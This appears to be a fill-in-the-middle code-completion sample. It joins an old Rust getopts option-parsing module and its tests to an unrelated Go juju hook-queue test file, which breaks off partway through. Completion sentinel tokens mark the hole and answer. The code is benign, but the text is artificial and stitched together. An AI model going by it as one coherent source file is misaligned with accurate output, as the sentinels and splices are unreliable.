pub fn reqopt(short_name: &str, long_name: &str, desc: &str, hint: &str) -> OptGroup {
let len = short_name.len();
assert!(len == 1 || len == 0);
OptGroup {
short_name: short_name.to_owned(),
long_name: long_name.to_owned(),
hint: hint.to_owned(),
desc: desc.to_owned(),
hasarg: Yes,
occur: Req
}
}
/// Create a long option that is optional and takes an argument.
pub fn optopt(short_name: &str, long_name: &str, desc: &str, hint: &str) -> OptGroup {
let len = short_name.len();
assert!(len == 1 || len == 0);
OptGroup {
short_name: short_name.to_owned(),
long_name: long_name.to_owned(),
hint: hint.to_owned(),
desc: desc.to_owned(),
hasarg: Yes,
occur: Optional
}
}
/// Create a long option that is optional and does not take an argument.
pub fn optflag(short_name: &str, long_name: &str, desc: &str) -> OptGroup {
let len = short_name.len();
assert!(len == 1 || len == 0);
OptGroup {
short_name: short_name.to_owned(),
long_name: long_name.to_owned(),
hint: ~"",
desc: desc.to_owned(),
hasarg: No,
occur: Optional
}
}
/// Create a long option that can occur more than once and does not
/// take an argument.
pub fn optflagmulti(short_name: &str, long_name: &str, desc: &str) -> OptGroup {
let len = short_name.len();
assert!(len == 1 || len == 0);
OptGroup {
short_name: short_name.to_owned(),
long_name: long_name.to_owned(),
hint: ~"",
desc: desc.to_owned(),
hasarg: No,
occur: Multi
}
}
/// Create a long option that is optional and takes an optional argument.
pub fn optflagopt(short_name: &str, long_name: &str, desc: &str, hint: &str) -> OptGroup {
let len = short_name.len();
assert!(len == 1 || len == 0);
OptGroup {
short_name: short_name.to_owned(),
long_name: long_name.to_owned(),
hint: hint.to_owned(),
desc: desc.to_owned(),
hasarg: Maybe,
occur: Optional
}
}
/// Create a long option that is optional, takes an argument, and may occur
/// multiple times.
pub fn optmulti(short_name: &str, long_name: &str, desc: &str, hint: &str) -> OptGroup {
let len = short_name.len();
assert!(len == 1 || len == 0);
OptGroup {
short_name: short_name.to_owned(),
long_name: long_name.to_owned(),
hint: hint.to_owned(),
desc: desc.to_owned(),
hasarg: Yes,
occur: Multi
}
}
/// Parse command line args with the provided long format options.
pub fn getopts(args: &[~str], opts: &[OptGroup]) -> ::getopts::Result {
::getopts::getopts(args, opts.map(|x| x.long_to_short()))
}
/// Derive a usage message from a set of long options.
pub fn usage(brief: &str, opts: &[OptGroup]) -> ~str {
let desc_sep = "\n" + " ".repeat(24);
let mut rows = opts.iter().map(|optref| {
let OptGroup{short_name: short_name,
long_name: long_name,
hint: hint,
desc: desc,
hasarg: hasarg,
_} = (*optref).clone();
let mut row = " ".repeat(4);
// short option
match short_name.len() {
0 => {}
1 => {
row.push_char('-');
row.push_str(short_name);
row.push_char(' ');
}
_ => fail2!("the short name should only be 1 ascii char long"),
}
// long option
match long_name.len() {
0 => {}
_ => {
row.push_str("--");
row.push_str(long_name);
row.push_char(' ');
}
}
// arg
match hasarg {
No => {}
Yes => row.push_str(hint),
Maybe => {
row.push_char('[');
row.push_str(hint);
row.push_char(']');
}
}
// FIXME: #5516 should be graphemes not codepoints
// here we just need to indent the start of the description
let rowlen = row.char_len();
if rowlen < 24 {
do (24 - rowlen).times {
row.push_char(' ')
}
} else {
row.push_str(desc_sep)
}
// Normalize desc to contain words separated by one space character
let mut desc_normalized_whitespace = ~"";
for word in desc.word_iter() {
desc_normalized_whitespace.push_str(word);
desc_normalized_whitespace.push_char(' ');
}
// FIXME: #5516 should be graphemes not codepoints
let mut desc_rows = ~[];
do each_split_within(desc_normalized_whitespace, 54) |substr| {
desc_rows.push(substr.to_owned());
true
};
// FIXME: #5516 should be graphemes not codepoints
// wrapped description
row.push_str(desc_rows.connect(desc_sep));
row
});
format!("{}\n\nOptions:\n{}\n", brief, rows.collect::<~[~str]>().connect("\n"))
}
/// Splits a string into substrings with possibly internal whitespace,
/// each of them at most `lim` bytes long. The substrings have leading and trailing
/// whitespace removed, and are only cut at whitespace boundaries.
///
/// Note: Function was moved here from `std::str` because this module is the only place that
/// uses it, and because it was to specific for a general string function.
///
/// #Failure:
///
/// Fails during iteration if the string contains a non-whitespace
/// sequence longer than the limit.
fn each_split_within<'a>(ss: &'a str,
lim: uint,
it: &fn(&'a str) -> bool) -> bool {
// Just for fun, let's write this as a state machine:
enum SplitWithinState {
A, // leading whitespace, initial state
B, // words
C, // internal and trailing whitespace
}
enum Whitespace {
Ws, // current char is whitespace
Cr // current char is not whitespace
}
enum LengthLimit {
UnderLim, // current char makes current substring still fit in limit
OverLim // current char makes current substring no longer fit in limit
}
let mut slice_start = 0;
let mut last_start = 0;
let mut last_end = 0;
let mut state = A;
let mut fake_i = ss.len();
let mut lim = lim;
let mut cont = true;
let slice: &fn() = || { cont = it(ss.slice(slice_start, last_end)) };
// if the limit is larger than the string, lower it to save cycles
if (lim >= fake_i) {
lim = fake_i;
}
let machine: &fn((uint, char)) -> bool = |(i, c)| {
let whitespace = if ::std::char::is_whitespace(c) { Ws } else { Cr };
let limit = if (i - slice_start + 1) <= lim { UnderLim } else { OverLim };
state = match (state, whitespace, limit) {
(A, Ws, _) => { A }
(A, Cr, _) => { slice_start = i; last_start = i; B }
(B, Cr, UnderLim) => { B }
(B, Cr, OverLim) if (i - last_start + 1) > lim
=> fail2!("word starting with {} longer than limit!",
ss.slice(last_start, i + 1)),
(B, Cr, OverLim) => { slice(); slice_start = last_start; B }
(B, Ws, UnderLim) => { last_end = i; C }
(B, Ws, OverLim) => { last_end = i; slice(); A }
(C, Cr, UnderLim) => { last_start = i; B }
(C, Cr, OverLim) => { slice(); slice_start = i; last_start = i; last_end = i; B }
(C, Ws, OverLim) => { slice(); A }
(C, Ws, UnderLim) => { C }
};
cont
};
ss.char_offset_iter().advance(|x| machine(x));
// Let the automaton 'run out' by supplying trailing whitespace
while cont && match state { B | C => true, A => false } {
machine((fake_i, ' '));
fake_i += 1;
}
return cont;
}
#[test]
fn test_split_within() {
fn t(s: &str, i: uint, u: &[~str]) {
let mut v = ~[];
do each_split_within(s, i) |s| { v.push(s.to_owned()); true };
assert!(v.iter().zip(u.iter()).all(|(a,b)| a == b));
}
t("", 0, []);
t("", 15, []);
t("hello", 15, [~"hello"]);
t("\nMary had a little lamb\nLittle lamb\n", 15,
[~"Mary had a", ~"little lamb", ~"Little lamb"]);
t("\nMary had a little lamb\nLittle lamb\n", ::std::uint::max_value,
[~"Mary had a little lamb\nLittle lamb"]);
}
} // end groups module
#[cfg(test)]
mod tests {
use getopts::groups::OptGroup;
use getopts::*;
use std::result::{Err, Ok};
use std::result;
fn check_fail_type(f: Fail_, ft: FailType) {
match f {
ArgumentMissing(_) => assert!(ft == ArgumentMissing_),
UnrecognizedOption(_) => assert!(ft == UnrecognizedOption_),
OptionMissing(_) => assert!(ft == OptionMissing_),
OptionDuplicated(_) => assert!(ft == OptionDuplicated_),
UnexpectedArgument(_) => assert!(ft == UnexpectedArgument_)
}
}
// Tests for reqopt
#[test]
fn test_reqopt_long() {
let args = ~[~"--test=20"];
let opts = ~[reqopt("test")];
let rs = getopts(args, opts);
match rs {
Ok(ref m) => {
assert!(m.opt_present("test"));
assert_eq!(m.opt_str("test").unwrap(), ~"20");
}
_ => { fail2!("test_reqopt_long failed"); }
}
}
#[test]
fn test_reqopt_long_missing() {
let args = ~[~"blah"];
let opts = ~[reqopt("test")];
let rs = getopts(args, opts);
match rs {
Err(f) => check_fail_type(f, OptionMissing_),
_ => fail2!()
}
}
#[test]
fn test_reqopt_long_no_arg() {
let args = ~[~"--test"];
let opts = ~[reqopt("test")];
let rs = getopts(args, opts);
match rs {
Err(f) => check_fail_type(f, ArgumentMissing_),
_ => fail2!()
}
}
#[test]
fn test_reqopt_long_multi() {
let args = ~[~"--test=20", ~"--test=30"];
let opts = ~[reqopt("test")];
let rs = getopts(args, opts);
match rs {
Err(f) => check_fail_type(f, OptionDuplicated_),
_ => fail2!()
}
}
#[test]
fn test_reqopt_short() {
let args = ~[~"-t", ~"20"];
let opts = ~[reqopt("t")];
let rs = getopts(args, opts);
match rs {
Ok(ref m) => {
assert!(m.opt_present("t"));
assert_eq!(m.opt_str("t").unwrap(), ~"20");
}
_ => fail2!()
}
}
#[test]
fn test_reqopt_short_missing() {
let args = ~[~"blah"];
let opts = ~[reqopt("t")];
let rs = getopts(args, opts);
match rs {
Err(f) => check_fail_type(f, OptionMissing_),
_ => fail2!()
}
}
#[test]
fn test_reqopt_short_no_arg() {
let args = ~[~"-t"];
let opts = ~[reqopt("t")];
let rs = getopts(args, opts);
match rs {
Err(f) => check_fail_type(f, ArgumentMissing_),
_ => fail2!()
}
}
#[test]
fn test_reqopt_short_multi() {
let args = ~[~"-t", ~"20", ~"-t", ~"30"];
let opts = ~[reqopt("t")];
let rs = getopts(args, opts);
match rs {
Err(f) => check_fail_type(f, OptionDuplicated_),
_ => fail2!()
}
}
// Tests for optopt
#[test]
fn test_optopt_long() {
let args = ~[~"--test=20"];
let opts = ~[optopt("test")];
let rs = getopts(args, opts);
match rs {
Ok(ref m) => {
assert!(m.opt_present("test"));
assert_eq!(m.opt_str("test").unwrap(), ~"20");
}
_ => fail2!()
}
}
#[test]
fn test_optopt_long_missing() {
let args = ~[~"blah"];
let opts = ~[optopt("test")];
let rs = getopts(args, opts);
match rs {
Ok(ref m) => assert!(!m.opt_present("test")),
_ => fail2!()
}
}
#[test]
fn test_optopt_long_no_arg() {
let args = ~[~"--test"];
let opts = ~[optopt("test")];
let rs = getopts(args, opts);
match rs {
Err(f) => check_fail_type(f, ArgumentMissing_),
_ => fail2!()
}
}
#[test]
fn test_optopt_long_multi() {
let args = ~[~"--test=20", ~"--test=30"];
let opts = ~[optopt("test")];
let rs = getopts(args, opts);
match rs {<|fim▁hole|> }
}
#[test]
fn test_optopt_short() {
let args = ~[~"-t", ~"20"];
let opts = ~[optopt("t")];
let rs = getopts(args, opts);
match rs {
Ok(ref m) => {
assert!((m.opt_present("t")));
assert_eq!(m.opt_str("t").unwrap(), ~"20");
}
_ => fail2!()
}
}
#[test]
fn test_optopt_short_missing() {
let args = ~[~"blah"];
let opts = ~[optopt("t")];
let rs = getopts(args, opts);
match rs {
Ok(ref m) => assert!(!m.opt_present("t")),
_ => fail2!()
}
}
#[test]
fn test_optopt_short_no_arg() {
let args = ~[~"-t"];
let opts = ~[optopt("t")];
let rs = getopts(args, opts);
match rs {
Err(f) => check_fail_type(f, ArgumentMissing_),
_ => fail2!()
}
}
#[test]
fn test_optopt_short_multi() {
let args = ~[~"-t", ~"20", ~"-t", ~"30"];
let opts = ~[optopt("t")];
let rs = getopts(args, opts);
match rs {
Err(f) => check_fail_type(f, OptionDuplicated_),
_ => fail2!()
}
}
// Tests for optflag
#[test]
fn test_optflag_long() {
let args = ~[~"--test"];
let opts = ~[optflag("test")];
let rs = getopts(args, opts);
match rs {
Ok(ref m) => assert!(m.opt_present("test")),
_ => fail2!()
}
}
#[test]
fn test_optflag_long_missing() {
let args = ~[~"blah"];
let opts = ~[optflag("test")];
let rs = getopts(args, opts);
match rs {
Ok(ref m) => assert!(!m.opt_present("test")),
_ => fail2!()
}
}
#[test]
fn test_optflag_long_arg() {
let args = ~[~"--test=20"];
let opts = ~[optflag("test")];
let rs = getopts(args, opts);
match rs {
Err(f) => {
error2!("{:?}", f.clone().to_err_msg());
check_fail_type(f, UnexpectedArgument_);
}
_ => fail2!()
}
}
#[test]
fn test_optflag_long_multi() {
let args = ~[~"--test", ~"--test"];
let opts = ~[optflag("test")];
let rs = getopts(args, opts);
match rs {
Err(f) => check_fail_type(f, OptionDuplicated_),
_ => fail2!()
}
}
#[test]
fn test_optflag_short() {
let args = ~[~"-t"];
let opts = ~[optflag("t")];
let rs = getopts(args, opts);
match rs {
Ok(ref m) => assert!(m.opt_present("t")),
_ => fail2!()
}
}
#[test]
fn test_optflag_short_missing() {
let args = ~[~"blah"];
let opts = ~[optflag("t")];
let rs = getopts(args, opts);
match rs {
Ok(ref m) => assert!(!m.opt_present("t")),
_ => fail2!()
}
}
#[test]
fn test_optflag_short_arg() {
let args = ~[~"-t", ~"20"];
let opts = ~[optflag("t")];
let rs = getopts(args, opts);
match rs {
Ok(ref m) => {
// The next variable after the flag is just a free argument
assert!(m.free[0] == ~"20");
}
_ => fail2!()
}
}
#[test]
fn test_optflag_short_multi() {
let args = ~[~"-t", ~"-t"];
let opts = ~[optflag("t")];
let rs = getopts(args, opts);
match rs {
Err(f) => check_fail_type(f, OptionDuplicated_),
_ => fail2!()
}
}
// Tests for optflagmulti
#[test]
fn test_optflagmulti_short1() {
let args = ~[~"-v"];
let opts = ~[optflagmulti("v")];
let rs = getopts(args, opts);
match rs {
Ok(ref m) => {
assert_eq!(m.opt_count("v"), 1);
}
_ => fail2!()
}
}
#[test]
fn test_optflagmulti_short2a() {
let args = ~[~"-v", ~"-v"];
let opts = ~[optflagmulti("v")];
let rs = getopts(args, opts);
match rs {
Ok(ref m) => {
assert_eq!(m.opt_count("v"), 2);
}
_ => fail2!()
}
}
#[test]
fn test_optflagmulti_short2b() {
let args = ~[~"-vv"];
let opts = ~[optflagmulti("v")];
let rs = getopts(args, opts);
match rs {
Ok(ref m) => {
assert_eq!(m.opt_count("v"), 2);
}
_ => fail2!()
}
}
#[test]
fn test_optflagmulti_long1() {
let args = ~[~"--verbose"];
let opts = ~[optflagmulti("verbose")];
let rs = getopts(args, opts);
match rs {
Ok(ref m) => {
assert_eq!(m.opt_count("verbose"), 1);
}
_ => fail2!()
}
}
#[test]
fn test_optflagmulti_long2() {
let args = ~[~"--verbose", ~"--verbose"];
let opts = ~[optflagmulti("verbose")];
let rs = getopts(args, opts);
match rs {
Ok(ref m) => {
assert_eq!(m.opt_count("verbose"), 2);
}
_ => fail2!()
}
}
// Tests for optmulti
#[test]
fn test_optmulti_long() {
let args = ~[~"--test=20"];
let opts = ~[optmulti("test")];
let rs = getopts(args, opts);
match rs {
Ok(ref m) => {
assert!((m.opt_present("test")));
assert_eq!(m.opt_str("test").unwrap(), ~"20");
}
_ => fail2!()
}
}
#[test]
fn test_optmulti_long_missing() {
let args = ~[~"blah"];
let opts = ~[optmulti("test")];
let rs = getopts(args, opts);
match rs {
Ok(ref m) => assert!(!m.opt_present("test")),
_ => fail2!()
}
}
#[test]
fn test_optmulti_long_no_arg() {
let args = ~[~"--test"];
let opts = ~[optmulti("test")];
let rs = getopts(args, opts);
match rs {
Err(f) => check_fail_type(f, ArgumentMissing_),
_ => fail2!()
}
}
#[test]
fn test_optmulti_long_multi() {
let args = ~[~"--test=20", ~"--test=30"];
let opts = ~[optmulti("test")];
let rs = getopts(args, opts);
match rs {
Ok(ref m) => {
assert!(m.opt_present("test"));
assert_eq!(m.opt_str("test").unwrap(), ~"20");
let pair = m.opt_strs("test");
assert!(pair[0] == ~"20");
assert!(pair[1] == ~"30");
}
_ => fail2!()
}
}
#[test]
fn test_optmulti_short() {
let args = ~[~"-t", ~"20"];
let opts = ~[optmulti("t")];
let rs = getopts(args, opts);
match rs {
Ok(ref m) => {
assert!((m.opt_present("t")));
assert_eq!(m.opt_str("t").unwrap(), ~"20");
}
_ => fail2!()
}
}
#[test]
fn test_optmulti_short_missing() {
let args = ~[~"blah"];
let opts = ~[optmulti("t")];
let rs = getopts(args, opts);
match rs {
Ok(ref m) => assert!(!m.opt_present("t")),
_ => fail2!()
}
}
#[test]
fn test_optmulti_short_no_arg() {
let args = ~[~"-t"];
let opts = ~[optmulti("t")];
let rs = getopts(args, opts);
match rs {
Err(f) => check_fail_type(f, ArgumentMissing_),
_ => fail2!()
}
}
#[test]
fn test_optmulti_short_multi() {
let args = ~[~"-t", ~"20", ~"-t", ~"30"];
let opts = ~[optmulti("t")];
let rs = getopts(args, opts);
match rs {
Ok(ref m) => {
assert!((m.opt_present("t")));
assert_eq!(m.opt_str("t").unwrap(), ~"20");
let pair = m.opt_strs("t");
assert!(pair[0] == ~"20");
assert!(pair[1] == ~"30");
}
_ => fail2!()
}
}
#[test]
fn test_unrecognized_option_long() {
let args = ~[~"--untest"];
let opts = ~[optmulti("t")];
let rs = getopts(args, opts);
match rs {
Err(f) => check_fail_type(f, UnrecognizedOption_),
_ => fail2!()
}
}
#[test]
fn test_unrecognized_option_short() {
let args = ~[~"-t"];
let opts = ~[optmulti("test")];
let rs = getopts(args, opts);
match rs {
Err(f) => check_fail_type(f, UnrecognizedOption_),
_ => fail2!()
}
}
#[test]
fn test_combined() {
let args =
~[~"prog", ~"free1", ~"-s", ~"20", ~"free2",
~"--flag", ~"--long=30", ~"-f", ~"-m", ~"40",
~"-m", ~"50", ~"-n", ~"-A B", ~"-n", ~"-60 70"];
let opts =
~[optopt("s"), optflag("flag"), reqopt("long"),
optflag("f"), optmulti("m"), optmulti("n"),
optopt("notpresent")];
let rs = getopts(args, opts);
match rs {
Ok(ref m) => {
assert!(m.free[0] == ~"prog");
assert!(m.free[1] == ~"free1");
assert_eq!(m.opt_str("s").unwrap(), ~"20");
assert!(m.free[2] == ~"free2");
assert!((m.opt_present("flag")));
assert_eq!(m.opt_str("long").unwrap(), ~"30");
assert!((m.opt_present("f")));
let pair = m.opt_strs("m");
assert!(pair[0] == ~"40");
assert!(pair[1] == ~"50");
let pair = m.opt_strs("n");
assert!(pair[0] == ~"-A B");
assert!(pair[1] == ~"-60 70");
assert!((!m.opt_present("notpresent")));
}
_ => fail2!()
}
}
#[test]
fn test_multi() {
let opts = ~[optopt("e"), optopt("encrypt"), optopt("f")];
let args_single = ~[~"-e", ~"foo"];
let matches_single = &match getopts(args_single, opts) {
result::Ok(m) => m,
result::Err(_) => fail2!()
};
assert!(matches_single.opts_present([~"e"]));
assert!(matches_single.opts_present([~"encrypt", ~"e"]));
assert!(matches_single.opts_present([~"e", ~"encrypt"]));
assert!(!matches_single.opts_present([~"encrypt"]));
assert!(!matches_single.opts_present([~"thing"]));
assert!(!matches_single.opts_present([]));
assert_eq!(matches_single.opts_str([~"e"]).unwrap(), ~"foo");
assert_eq!(matches_single.opts_str([~"e", ~"encrypt"]).unwrap(), ~"foo");
assert_eq!(matches_single.opts_str([~"encrypt", ~"e"]).unwrap(), ~"foo");
let args_both = ~[~"-e", ~"foo", ~"--encrypt", ~"foo"];
let matches_both = &match getopts(args_both, opts) {
result::Ok(m) => m,
result::Err(_) => fail2!()
};
assert!(matches_both.opts_present([~"e"]));
assert!(matches_both.opts_present([~"encrypt"]));
assert!(matches_both.opts_present([~"encrypt", ~"e"]));
assert!(matches_both.opts_present([~"e", ~"encrypt"]));
assert!(!matches_both.opts_present([~"f"]));
assert!(!matches_both.opts_present([~"thing"]));
assert!(!matches_both.opts_present([]));
assert_eq!(matches_both.opts_str([~"e"]).unwrap(), ~"foo");
assert_eq!(matches_both.opts_str([~"encrypt"]).unwrap(), ~"foo");
assert_eq!(matches_both.opts_str([~"e", ~"encrypt"]).unwrap(), ~"foo");
assert_eq!(matches_both.opts_str([~"encrypt", ~"e"]).unwrap(), ~"foo");
}
#[test]
fn test_nospace() {
let args = ~[~"-Lfoo", ~"-M."];
let opts = ~[optmulti("L"), optmulti("M")];
let matches = &match getopts(args, opts) {
result::Ok(m) => m,
result::Err(_) => fail2!()
};
assert!(matches.opts_present([~"L"]));
assert_eq!(matches.opts_str([~"L"]).unwrap(), ~"foo");
assert!(matches.opts_present([~"M"]));
assert_eq!(matches.opts_str([~"M"]).unwrap(), ~".");
}
#[test]
fn test_groups_reqopt() {
let opt = groups::reqopt("b", "banana", "some bananas", "VAL");
assert!(opt == OptGroup { short_name: ~"b",
long_name: ~"banana",
hint: ~"VAL",
desc: ~"some bananas",
hasarg: Yes,
occur: Req })
}
#[test]
fn test_groups_optopt() {
let opt = groups::optopt("a", "apple", "some apples", "VAL");
assert!(opt == OptGroup { short_name: ~"a",
long_name: ~"apple",
hint: ~"VAL",
desc: ~"some apples",
hasarg: Yes,
occur: Optional })
}
#[test]
fn test_groups_optflag() {
let opt = groups::optflag("k", "kiwi", "some kiwis");
assert!(opt == OptGroup { short_name: ~"k",
long_name: ~"kiwi",
hint: ~"",
desc: ~"some kiwis",
hasarg: No,
occur: Optional })
}
#[test]
fn test_groups_optflagopt() {
let opt = groups::optflagopt("p", "pineapple", "some pineapples", "VAL");
assert!(opt == OptGroup { short_name: ~"p",
long_name: ~"pineapple",
hint: ~"VAL",
desc: ~"some pineapples",
hasarg: Maybe,
occur: Optional })
}
#[test]
fn test_groups_optmulti() {
let opt = groups::optmulti("l", "lime", "some limes", "VAL");
assert!(opt == OptGroup { short_name: ~"l",
long_name: ~"lime",
hint: ~"VAL",
desc: ~"some limes",
hasarg: Yes,
occur: Multi })
}
#[test]
fn test_groups_long_to_short() {
let mut short = reqopt("banana");
short.aliases = ~[reqopt("b")];
let verbose = groups::reqopt("b", "banana", "some bananas", "VAL");
assert_eq!(verbose.long_to_short(), short);
}
#[test]
fn test_groups_getopts() {
let mut banana = reqopt("banana");
banana.aliases = ~[reqopt("b")];
let mut apple = optopt("apple");
apple.aliases = ~[optopt("a")];
let mut kiwi = optflag("kiwi");
kiwi.aliases = ~[optflag("k")];
let short = ~[
banana,
apple,
kiwi,
optflagopt("p"),
optmulti("l")
];
let verbose = ~[
groups::reqopt("b", "banana", "Desc", "VAL"),
groups::optopt("a", "apple", "Desc", "VAL"),
groups::optflag("k", "kiwi", "Desc"),
groups::optflagopt("p", "", "Desc", "VAL"),
groups::optmulti("l", "", "Desc", "VAL"),
];
let sample_args = ~[~"--kiwi", ~"15", ~"--apple", ~"1", ~"k",
~"-p", ~"16", ~"l", ~"35"];
// FIXME #4681: sort options here?
assert!(getopts(sample_args, short)
== groups::getopts(sample_args, verbose));
}
#[test]
fn test_groups_aliases_long_and_short() {
let opts = ~[
groups::optflagmulti("a", "apple", "Desc"),
];
let args = ~[~"-a", ~"--apple", ~"-a"];
let matches = groups::getopts(args, opts).unwrap();
assert_eq!(3, matches.opt_count("a"));
assert_eq!(3, matches.opt_count("apple"));
}
#[test]
fn test_groups_usage() {
let optgroups = ~[
groups::reqopt("b", "banana", "Desc", "VAL"),
groups::optopt("a", "012345678901234567890123456789",
"Desc", "VAL"),
groups::optflag("k", "kiwi", "Desc"),
groups::optflagopt("p", "", "Desc", "VAL"),
groups::optmulti("l", "", "Desc", "VAL"),
];
let expected =
~"Usage: fruits
Options:
-b --banana VAL Desc
-a --012345678901234567890123456789 VAL
Desc
-k --kiwi Desc
-p [VAL] Desc
-l VAL Desc
";
let generated_usage = groups::usage("Usage: fruits", optgroups);
debug2!("expected: <<{}>>", expected);
debug2!("generated: <<{}>>", generated_usage);
assert_eq!(generated_usage, expected);
}
#[test]
fn test_groups_usage_description_wrapping() {
// indentation should be 24 spaces
// lines wrap after 78: or rather descriptions wrap after 54
let optgroups = ~[
groups::optflag("k", "kiwi",
"This is a long description which won't be wrapped..+.."), // 54
groups::optflag("a", "apple",
"This is a long description which _will_ be wrapped..+.."), // 55
];
let expected =
~"Usage: fruits
Options:
-k --kiwi This is a long description which won't be wrapped..+..
-a --apple This is a long description which _will_ be
wrapped..+..
";
let usage = groups::usage("Usage: fruits", optgroups);
debug2!("expected: <<{}>>", expected);
debug2!("generated: <<{}>>", usage);
assert!(usage == expected)
}
#[test]
fn test_groups_usage_description_multibyte_handling() {
let optgroups = ~[
groups::optflag("k", "k\u2013w\u2013",
"The word kiwi is normally spelled with two i's"),
groups::optflag("a", "apple",
"This \u201Cdescription\u201D has some characters that could \
confuse the line wrapping; an apple costs 0.51€ in some parts of Europe."),
];
let expected =
~"Usage: fruits
Options:
-k --k–w– The word kiwi is normally spelled with two i's
-a --apple This “description” has some characters that could
confuse the line wrapping; an apple costs 0.51€ in
some parts of Europe.
";
let usage = groups::usage("Usage: fruits", optgroups);
debug2!("expected: <<{}>>", expected);
debug2!("generated: <<{}>>", usage);
assert!(usage == expected)
}
}<|fim▁end|> | Err(f) => check_fail_type(f, OptionDuplicated_),
_ => fail2!() |
<|file_name|>hookqueue_test.go<|end_file_name|><|fim▁begin|>// Copyright 2012, 2013 Canonical Ltd.
// Licensed under the AGPLv3, see LICENCE file for details.
package relation_test
import (
stdtesting "testing"
"time"
"github.com/juju/charm/hooks"
gc "launchpad.net/gocheck"
"github.com/juju/juju/state/api/params"
coretesting "github.com/juju/juju/testing"
"github.com/juju/juju/worker/uniter/hook"
"github.com/juju/juju/worker/uniter/relation"
)
func Test(t *stdtesting.T) { coretesting.MgoTestPackage(t) }
type HookQueueSuite struct{}
var _ = gc.Suite(&HookQueueSuite{})
type msi map[string]int64
type hookQueueTest struct {
summary string
initial *relation.State
steps []checker
}
<|fim▁hole|>
func reconcileTest(summary string, members msi, joined string, steps ...checker) hookQueueTest {
return hookQueueTest{summary, &relation.State{21345, members, joined}, steps}
}
var aliveHookQueueTests = []hookQueueTest{
fullTest(
"Empty initial change causes no hooks.",
send{nil, nil},
), fullTest(
"Joined and changed are both run when unit is first detected.",
send{msi{"u/0": 0}, nil},
expect{hooks.RelationJoined, "u/0", 0},
expect{hooks.RelationChanged, "u/0", 0},
), fullTest(
"Automatic changed is run with latest settings.",
send{msi{"u/0": 0}, nil},
expect{hooks.RelationJoined, "u/0", 0},
send{msi{"u/0": 7}, nil},
expect{hooks.RelationChanged, "u/0", 7},
), fullTest(
"Joined is also run with latest settings.",
send{msi{"u/0": 0}, nil},
send{msi{"u/0": 7}, nil},
expect{hooks.RelationJoined, "u/0", 7},
expect{hooks.RelationChanged, "u/0", 7},
), fullTest(
"Nothing happens if a unit departs before its joined is run.",
send{msi{"u/0": 0}, nil},
send{msi{"u/0": 7}, nil},
send{nil, []string{"u/0"}},
), fullTest(
"A changed is run after a joined, even if a departed is known.",
send{msi{"u/0": 0}, nil},
expect{hooks.RelationJoined, "u/0", 0},
send{nil, []string{"u/0"}},
expect{hooks.RelationChanged, "u/0", 0},
expect{hooks.RelationDeparted, "u/0", 0},
), fullTest(
"A departed replaces a changed.",
send{msi{"u/0": 0}, nil},
advance{2},
send{msi{"u/0": 7}, nil},
send{nil, []string{"u/0"}},
expect{hooks.RelationDeparted, "u/0", 7},
), fullTest(
"Changed events are ignored if the version has not changed.",
send{msi{"u/0": 0}, nil},
advance{2},
send{msi{"u/0": 0}, nil},
), fullTest(
"Redundant changed events are elided.",
send{msi{"u/0": 0}, nil},
advance{2},
send{msi{"u/0": 3}, nil},
send{msi{"u/0": 7}, nil},
send{msi{"u/0": 79}, nil},
expect{hooks.RelationChanged, "u/0", 79},
), fullTest(
"Latest hooks are run in the original unit order.",
send{msi{"u/0": 0, "u/1": 1}, nil},
advance{4},
send{msi{"u/0": 3}, nil},
send{msi{"u/1": 7}, nil},
send{nil, []string{"u/0"}},
expect{hooks.RelationDeparted, "u/0", 3},
expect{hooks.RelationChanged, "u/1", 7},
), fullTest(
"Test everything we can think of at the same time.",
send{msi{"u/0": 0, "u/1": 0, "u/2": 0, "u/3": 0, "u/4": 0}, nil},
advance{6},
// u/0, u/1, u/2 are now up to date; u/3, u/4 are untouched.
send{msi{"u/0": 1}, nil},
send{msi{"u/1": 1, "u/2": 1, "u/3": 1, "u/5": 0}, []string{"u/0", "u/4"}},
send{msi{"u/3": 2}, nil},
// - Finish off the rest of the initial state, ignoring u/4, but using
// the latest known settings.
expect{hooks.RelationJoined, "u/3", 2},
expect{hooks.RelationChanged, "u/3", 2},
// - u/0 was queued for change by the first RUC, but this change is
// no longer relevant; it's departed in the second RUC, so we run
// that hook instead.
expect{hooks.RelationDeparted, "u/0", 1},
// - Handle the remaining changes in the second RUC, still ignoring u/4.
// We do run new changed hooks for u/1 and u/2, because the latest settings
// are newer than those used in their original changed events.
expect{hooks.RelationChanged, "u/1", 1},
expect{hooks.RelationChanged, "u/2", 1},
expect{hooks.RelationJoined, "u/5", 0},
expect{hooks.RelationChanged, "u/5", 0},
// - Ignore the third RUC, because the original joined/changed on u/3
// was executed after we got the latest settings version.
), reconcileTest(
"Check that matching settings versions cause no changes.",
msi{"u/0": 0}, "",
send{msi{"u/0": 0}, nil},
), reconcileTest(
"Check that new settings versions cause appropriate changes.",
msi{"u/0": 0}, "",
send{msi{"u/0": 1}, nil},
expect{hooks.RelationChanged, "u/0", 1},
), reconcileTest(
"Check that a just-joined unit gets its changed hook run first.",
msi{"u/0": 0}, "u/0",
send{msi{"u/0": 0}, nil},
expect{hooks.RelationChanged, "u/0", 0},
), reconcileTest(
"Check that missing units are queued for depart as early as possible.",
msi{"u/0": 0}, "",
send{msi{"u/1": 0}, nil},
expect{hooks.RelationDeparted, "u/0", 0},
expect{hooks.RelationJoined, "u/1", 0},
expect{hooks.RelationChanged, "u/1", 0},
), reconcileTest(
"Double-check that a pending changed happens before an injected departed.",
msi{"u/0": 0}, "u/0",
send{nil, nil},
expect{hooks.RelationChanged, "u/0", 0},
expect{hooks.RelationDeparted, "u/0", 0},
), reconcileTest(
"Check that missing units don't slip in front of required changed hooks.",
msi{"u/0": 0}, "u/0",
send{msi{"u/1": 0}, nil},
expect{hooks.RelationChanged, "u/0", 0},
expect{hooks.RelationDeparted, "u/0", 0},
expect{hooks.RelationJoined, "u/1", 0},
expect{hooks.RelationChanged, "u/1", 0},
),
}
func (s *HookQueueSuite) TestAliveHookQueue(c *gc.C) {
for i, t := range aliveHookQueueTests {
c.Logf("test %d: %s", i, t.summary)
out := make(chan hook.Info)
in := make(chan params.RelationUnitsChange)
ruw := &RUW{in, false}
q := relation.NewAliveHookQueue(t.initial, out, ruw)
for i, step := range t.steps {
c.Logf(" step %d", i)
step.check(c, in, out)
}
expect{}.check(c, in, out)
q.Stop()
c.Assert(ruw.stopped, gc.Equals, true)
}
}
var dyingHookQueueTests = []hookQueueTest{
fullTest(
"Empty state just gets a broken hook.",
expect{hook: hooks.RelationBroken},
), reconcileTest(
"Each current member is departed before broken is sent.",
msi{"u/1": 7, "u/4": 33}, "",
expect{hooks.RelationDeparted, "u/1", 7},
